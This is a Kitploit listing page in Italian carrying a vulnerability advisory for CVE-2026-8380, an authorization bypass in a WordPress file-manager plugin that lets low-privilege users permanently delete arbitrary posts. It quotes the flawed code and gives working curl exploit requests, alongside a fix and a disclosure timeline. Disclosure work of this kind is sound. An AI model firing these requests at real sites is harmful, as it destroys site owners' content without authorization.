Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-8380 — CVE-2026-8380 | Kitploit
Strumenti/GitHubGitHub/tiagob0b/cve-2026-8380
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubtiagob0b/cve-2026-8380

CVE-2026-8380

CVE-2026-8380

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-8380

CVE-2026-8380 — Frontend File Manager <= 23.6 Cancellazione Arbitraria di Post

Panoramica

È stata identificata una critica falla di autorizzazione nel plugin WordPress Frontend File Manager (nmedia-user-file-uploader) che interessa le versioni <= 23.6.

La vulnerabilità consente a utenti autenticati con privilegi bassi di eliminare permanentemente post, pagine, allegati e tipi di post personalizzati arbitrari di WordPress a causa di una convalida di autorizzazione impropria nell'endpoint di eliminazione AJAX.

Quando l'opzione del plugin _allow_guest_upload=yes è abilitata, la vulnerabilità diventa sfruttabile da attaccanti non autenticati.

  • CVE: CVE-2026-8380
  • Plugin: Frontend File Manager (nmedia-user-file-uploader)
  • Versioni Affette: <= 23.6
  • Ricercatore: Tiago Ferreira
  • CWE: CWE-639 / CWE-862
  • Tipo di Vulnerabilità: Cancellazione Arbitraria di Post
  • WPScan: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

Riepilogo Esecutivo

Il plugin contiene una vulnerabilità critica di bypass dell'autorizzazione che consente l'eliminazione arbitraria di contenuti WordPress attraverso una convalida di discrepanza dei parametri all'interno dell'azione AJAX wpfm_delete_file.

La vulnerabilità è stata convalidata con successo in un ambiente di laboratorio controllato con sfruttamento attivo del Proof-of-Concept.

Ulteriori debolezze di sicurezza sono state identificate durante la ricerca:

  • CSRF negli endpoint di aggiornamento dei metadati senza convalida nonce
  • Bypass della lista consentita delle estensioni basato solo sull'ultima estensione del file
  • _allow_guest_upload che disabilita i controlli di autorizzazione in più endpoint
  • Limitazione della velocità basata solo su REMOTE_ADDR

Endpoint Vulnerabile

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=wpfm_delete_file

File Interessato

root@kitploit:~
inc/files.php

Regione di Codice Vulnerabile

root@kitploit:~
// inc/files.php:691
if( !$allow_guest && ! wpfm_is_current_user_post_author($_POST['file_id'] )) {
    wp_send_json_error(__("Sorry, not allowed", "wpfm"));
}

// inc/files.php:695
$file_ids = isset($_POST['file_ids']) && is_array($_POST['file_ids'])
            ? array_map('intval', $_POST['file_ids']) : [];

foreach ($file_ids as $file_id) {
    $file = new WPFM_File($file_id);

    wp_delete_post($file_id, $bypass_trash);
}

Causa Principale

Il controllo di autorizzazione convalida la proprietà utilizzando il parametro singolare:

root@kitploit:~
$_POST['file_id']

Tuttavia, l'operazione di eliminazione effettiva itera su un parametro diverso:

root@kitploit:~
$_POST['file_ids[]']

A causa di questa discrepanza, un attaccante può:

  1. Fornire un post legittimo di proprietà in file_id
  2. Iniettare ID di post vittima arbitrari in file_ids[]

Non esiste alcuna convalida per garantire:

  • la proprietà di ogni elemento in file_ids[]
  • il post_type consentito
  • la relazione tra file_id e file_ids[]

Di conseguenza, i contenuti WordPress arbitrari possono essere eliminati permanentemente.


Impatto

Un utente autenticato con privilegi minimi può eliminare permanentemente:

  • Post
  • Pagine
  • Prodotti
  • Allegati
  • Tipi di Post Personalizzati
  • Contenuti specifici del plugin

L'eliminazione viene eseguita con:

root@kitploit:~
wp_delete_post($file_id, true);

Il che significa che il contenuto viene rimosso permanentemente senza recupero dal Cestino.

Se _allow_guest_upload=yes è abilitato:

  • lo sfruttamento diventa non autenticato
  • il controllo della proprietà dell'autore viene completamente saltato

Prova di Concetto

Ambiente di Laboratorio

  • Target: 192.168.1.1:8080
  • Ruolo dell'attaccante: Subscriber
  • Ruolo della vittima: Administrator

Account dell'attaccante

root@kitploit:~
wpfm_sub : Sub@Test123

Post della vittima

root@kitploit:~
Page ID: 60
Post ID: 61

Passo 1 — Ottenere il Nonce

L'attaccante visita una pagina contenente lo shortcode:

root@kitploit:~
[ffmwp]

Estrarre il nonce:

root@kitploit:~
curl -b sub_cookie http://target/wpfm-test/ | grep wpfm_ajax_nonce

Risposta:

root@kitploit:~
value="9c233d4720"

Passo 2 — Attivare l'Eliminazione Arbitraria

root@kitploit:~
curl -b sub_cookie -X POST http://target/wp-admin/admin-ajax.php \
    --data 'action=wpfm_delete_file' \
    --data 'wpfm_ajax_nonce=9c233d4720' \
    --data 'file_id=57' \
    --data 'file_ids[]=60' \
    --data 'file_ids[]=61'

Spiegazione

ParametroDescrizione
file_id=57Post di proprietà dell'abbonato utilizzato per bypassare l'autorizzazione
file_ids[]=60Pagina dell'amministratore vittima
file_ids[]=61Post dell'amministratore vittima

Risposta di Successo

root@kitploit:~
{
  "success": true,
  "data": {
    "message": "2 files, directories are removed inside SUB-OWNED"
  }
}

Verifica

root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/pages/60
root@kitploit:~
404
root@kitploit:~
curl -o /dev/null -w "%{http_code}\n" \
http://target/wp-json/wp/v2/posts/61
root@kitploit:~
404

Gravità

Scenario Autenticato

CVSS 3.1

root@kitploit:~
8.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Scenario con Caricamento Ospite Abilitato

CVSS 3.1

root@kitploit:~
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Classificazione CWE

  • CWE-639 — Bypass dell'autorizzazione tramite chiave controllata dall'utente
  • CWE-862 — Autorizzazione mancante

Correzione Raccomandata

Convalidare la proprietà e il tipo di post per ogni voce all'interno di file_ids[].

Esempio di implementazione sicura:

root@kitploit:~
foreach ($file_ids as $fid) {

    if ( ! wpfm_is_current_user_post_author($fid) ) {
        wp_send_json_error(...);
    }

    if ( get_post_type($fid) !== 'wpfm-files' ) {
        wp_send_json_error(...);
    }
}

Cronologia

EventoData
Vulnerabilità Scoperta2026-05-28
Fornitore Contattato2026-05-28
WPScan Pubblicato2026-06-04
Divulgazione Pubblica2026-06-18

Riferimenti

  • WPScan Advisory: https://wpscan.com/vulnerability/45fcbf74-45be-4cff-a81a-0fea903592a5/

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-8380


Disclaimer

Questa ricerca è stata eseguita in un ambiente di laboratorio controllato solo per scopi educativi e di ricerca sulla sicurezza.

Non testare i sistemi senza la dovuta autorizzazione.

Scarica lo strumento